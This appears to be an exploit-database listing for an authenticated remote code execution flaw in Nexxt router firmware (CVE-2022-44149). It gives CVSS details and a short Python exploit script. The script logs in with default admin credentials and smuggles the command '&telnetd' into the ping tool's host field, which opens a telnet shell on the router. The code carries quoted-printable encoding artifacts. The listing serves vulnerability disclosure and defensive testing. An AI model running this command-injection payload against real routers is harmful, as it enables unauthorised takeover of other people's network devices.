Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

2023-04-0100:00:00

Yerodin Richards

www.exploit-db.com

nexxt router

firmware

remote code execution

authentication

cve-2022-44149

vulnerability

exploit

security advisory

base64

authentication bypass

telnet

router host

requests

vendor website

version 42.103.1.5095

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

8.9

Confidence

High

EPSS

0.038

Percentile

92.1%

JSON

# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
n (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host =3D "http://192.168.1.1"
username =3D "admin"
password =3D "admin"


def main():
    send_payload("&telnetd")
    print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
` using known credentials")
    pass

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def get_cookie(header):
    url =3D router_host+"/login"
    params =3D {"arg":header, "_n":1}
    resp=3Drequests.get(url, params=3Dparams)
   =20
def send_payload(payload):
    url =3D router_host+"/goform/sysTools"
    headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
ssword))}
    params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
"}
    requests.post(url, headers=3Dheaders, data=3Dparams)


if __name__ =3D=3D '__main__':
    main()